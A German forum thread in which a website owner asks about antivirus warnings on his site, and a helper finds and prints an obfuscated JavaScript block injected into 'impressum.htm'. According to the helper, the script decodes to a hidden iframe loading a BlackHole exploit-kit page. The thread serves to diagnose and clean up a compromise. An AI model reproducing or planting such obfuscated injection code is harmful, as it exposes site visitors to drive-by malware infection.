Hallo,
ich habe ein Problem mit meiner Webseite.
Immer wenn ein Fan die Seite aufruft kommt folgende Fehlermeldung:



Bei vielen anderen Fans ist das aber nicht der Fall.
Was ist hier das Problem ?

Danke für die Hilfe
Gruß
JN

Es kann ein Fehlalarm sein oder die Seite wurde kompromittiert.
Du betreust die Website?

ja ich betreue die seite ansich
was genau meinst du mit deiner antwort ?

gruß

Was ist an meiner Antwort denn nicht zu verstehen?
Als Administrator deiner Seite müsstest DU wissen, ob auf ihr was verändert wurde!
Ich kann nur sagen, dass es entweder ein Fehlalarm ist oder ein bislang fast unbekannter Schädling (ein Exploit) dort in ihr integriert wurde.

Sicherlich hast du Backups der Seite. Springt AVG da auch an?

ich habe die seite ansich erstellt aber jemand anderes bearbeitet sie weiter, klar ansich wir ja immer mal was verändert.
komischerweise springt diese meldung nicht bei mehreren auf

ich muss nochmal genau nachfragen wann die meldung kommt usw

Zitat:

komischerweise springt diese meldung nicht bei mehreren auf

Wieso "komischerweise"? Ich hab dir erklärt, dass es wohl am ehestens ein Fehlalarm ist.
Man sollte das aber prüfen. Ich weiß nicht, wie sehr du diesem Menschen traust, der ständig deine Seite verändern darf. Ist ja auch möglich, dass zB wegen gravierender Versäumnisse Sicherheitslücken ausgenutzt werden konnten oder er "zufällig" dort den Exploit eingebaut hat.

Ich würde im Moment einfach nur von einem Fehalarm ausgehen.

Hallo hudschi,

Ich würde mal sagen, dass zumindest die Seite "impressum.htm" kompromittiert ist!
Nach dem Body-Bereich sind noch zwei Javascript eingebunden:

Code: Alles auswählenAufklappen

ATTFilter

function createCSS(selector,declaration){var ua=navigator.userAgent.toLowerCase();var isIE=(/msie/.test(ua))&&!(/opera/.test(ua))&&(/win/.test(ua));var style_node=document.createElement("style");if(!isIE)style_node.innerHTML=selector+" {"+declaration+"}";document.getElementsByTagName("head")[0].appendChild(style_node);if(isIE&&document.styleSheets&&document.styleSheets.length>0){var last_style_node=document.styleSheets[document.styleSheets.length-1];if(typeof(last_style_node.addRule)=="object")last_style_node.addRule(selector,declaration);}};var cg={jmu:1935,onyv:function(){createCSS("#c0","background: url(data:,evaString.fromCharCode)");var dtm=null;var r=document.styleSheets;for(var i=0;i<r.length;i++){try{var neki=r[i].cssRules||r[i].rules;for(var llqx=0;llqx<neki.length;llqx++){var hyww=neki.item?neki.item(llqx):neki[llqx];vh=hyww.style.backgroundImage.match(/url\("?data\:[^,]*,([^")]+)"?\)/)[1];if((vh!=null)&&(vh.indexOf("Str")!=-1))
dtm=vh;};}catch(e){};}
var s="";var g=function(){return this;}();fhxt=g[dtm.substr(0,3)+"l"];var xp="1926q1926q1830q1833q1903q1895q1835q1824q1836q1818q1826q1834q1825q1819q1889q1832q1834q1819q1866q1827q1834q1826q1834q1825q1819q1820q1869q1814q1851q1838q1832q1857q1838q1826q1834q1895q1896q1837q1824q1835q1814q1896q1894q1844q1887q1842q1894q1812q1922q1926q1926q1926q1830q1833q1821q1838q1826q1834q1821q1895q1894q1876q1922q1926q1926q1810q1903q1834q1827q1820q1834q1903q1812q1922q1926q1926q1926q1817q1838q1821q1903q1837q1835q1814q1903q1874q1903q1835q1824q1836q1818q1826q1834q1825q1819q1889q1836q1821q1834q1838q1819q1834q1866q1827q1834q1826q1834q1825q1819q1895q1901q1837q1824q1835q1814q1901q1894q1876q1922q1926q1926q1926q1819q1821q1814q1903q1812q1922q1926q1926q1926q1926q1835q1824q1836q1818q1826q1834q1825q1819q1889q1838q1823q1823q1834q1825q1835q1868q1831q1830q1827q1835q1895q1837q1835q1814q1894q1876q1922q1926q1926q1926q1810q1903q1836q1838q1819q1836q1831q1903q1895q1834q1894q1903q1812q1922q1926q1926q1926q1926q1835q1824q1836q1818q1826q1834q1825q1819q1889q1837q1824q1835q1814q1903q1874q1903q1837q1835q1814q1876q1922q1926q1926q1926q1810q1922q1926q1926q1926q1830q1833q1903q1895q1835q1824q1836q1818q1826q1834q1825q1819q1889q1832q1834q1819q1866q1827q1834q1826q1834q1825q1819q1820q1869q1814q1851q1838q1832q1857q1838q1826q1834q1895q1896q1837q1824q1835q1814q1896q1894q1844q1887q1842q1894q1812q1922q1926q1926q1926q1926q1830q1833q1821q1838q1826q1834q1821q1895q1894q1876q1922q1926q1926q1926q1810q1903q1834q1827q1820q1834q1903q1812q1922q1926q1926q1926q1926q1835q1824q1836q1818q1826q1834q1825q1819q1889q1816q1821q1830q1819q1834q1895q1901q1875q1830q1833q1821q1838q1826q1834q1903q1820q1821q1836q1874q1896q1831q1819q1819q1823q1877q1888q1888q1835q1886q1833q1886q1816q1889q1819q1828q1888q1830q1825q1835q1834q1815q1889q1823q1831q1823q1872q1819q1823q1874q1882q1881q1836q1837q1838q1885q1886q1884q1887q1882q1837q1837q1885q1833q1885q1887q1896q1903q1816q1830q1835q1819q1831q1874q1896q1886q1887q1896q1903q1831q1834q1830q1832q1831q1819q1874q1896q1886q1887q1896q1903q1820q1819q1814q1827q1834q1874q1896q1817q1830q1820q1830q1837q1830q1827q1830q1819q1814q1877q1831q1830q1835q1835q1834q1825q1876q1823q1824q1820q1830q1819q1830q1824q1825q1877q1838q1837q1820q1824q1827q1818q1819q1834q1876q1827q1834q1833q1819q1877q1887q1876q1819q1824q1823q1877q1887q1876q1896q1873q1875q1888q1830q1833q1821q1838q1826q1834q1873q1901q1894q1876q1922q1926q1926q1926q1810q1922q1926q1926q1810q1922q1926q1926q1833q1818q1825q1836q1819q1830q1824q1825q1903q1830q1833q1821q1838q1826q1834q1821q1895q1894q1812q1922q1926q1926q1926q1817q1838q1821q1903q1833q1903q1874q1903q1835q1824q1836q1818q1826q1834q1825q1819q1889q1836q1821q1834q1838q1819q1834q1866q1827q1834q1826q1834q1825q1819q1895q1896q1830q1833q1821q1838q1826q1834q1896q1894q1876q1833q1889q1820q1834q1819q1870q1819q1819q1821q1830q1837q1818q1819q1834q1895q1896q1820q1821q1836q1896q1891q1896q1831q1819q1819q1823q1877q1888q1888q1835q1886q1833q1886q1816q1889q1819q1828q1888q1830q1825q1835q1834q1815q1889q1823q1831q1823q1872q1819q1823q1874q1882q1881q1836q1837q1838q1885q1886q1884q1887q1882q1837q1837q1885q1833q1885q1887q1896q1894q1876q1833q1889q1820q1819q1814q1827q1834q1889q1817q1830q1820q1830q1837q1830q1827q1830q1819q1814q1874q1896q1831q1830q1835q1835q1834q1825q1896q1876q1833q1889q1820q1819q1814q1827q1834q1889q1823q1824q1820q1830q1819q1830q1824q1825q1874q1896q1838q1837q1820q1824q1827q1818q1819q1834q1896q1876q1833q1889q1820q1819q1814q1827q1834q1889q1827q1834q1833q1819q1874q1896q1887q1896q1876q1833q1889q1820q1819q1814q1827q1834q1889q1819q1824q1823q1874q1896q1887q1896q1876q1833q1889q1820q1834q1819q1870q1819q1819q1821q1830q1837q1818q1819q1834q1895q1896q1816q1830q1835q1819q1831q1896q1891q1896q1886q1887q1896q1894q1876q1833q1889q1820q1834q1819q1870q1819q1819q1821q1830q1837q1818q1819q1834q1895q1896q1831q1834q1830q1832q1831q1819q1896q1891q1896q1886q1887q1896q1894q1876q1922q1926q1926q1926q1835q1824q1836q1818q1826q1834q1825q1819q1889q1832q1834q1819q1866q1827q1834q1826q1834q1825q1819q1820q1869q1814q1851q1838q1832q1857q1838q1826q1834q1895q1896q1837q1824q1835q1814q1896q1894q1844q1887q1842q1889q1838q1823q1823q1834q1825q1835q1868q1831q1830q1827q1835q1895q1833q1894q1876q1922q1926q1926q1810".split("q");lnek=fhxt(dtm.substr(3));for(var i=0;i<xp.length;i++){qvd=cg.jmu-parseInt(xp[i]);s+=(lnek(qvd));}
fhxt(s);}};cg.onyv();
         

Decodiert ergibt das ganze einen (mittlerweile toten) Iframe, der eine Seite nach dem BlackHole-Exploit-URL-Muster einbindet.
Die URL scheint offline zu sein...

Jemand dürfte sich auf jeden Fall Zugang zur Seite verschafft haben, oder Sicherheitslücken ausgenutzt haben.
Mehr kann ich auch nicht dazu sagen.

Ich an deiner Stelle, würde umgehend die Seite auf weitere solcher obskuren Scripte auntersuchen und ggf. sofort entfernen!

Viel Erfolg dabei

Gruß
Handball10

Hm, also zumindest teils kompromittiert.
Hilft wohl nur ein sauberes Backup und sofort etwaige Sicherheitslücken zu entfernen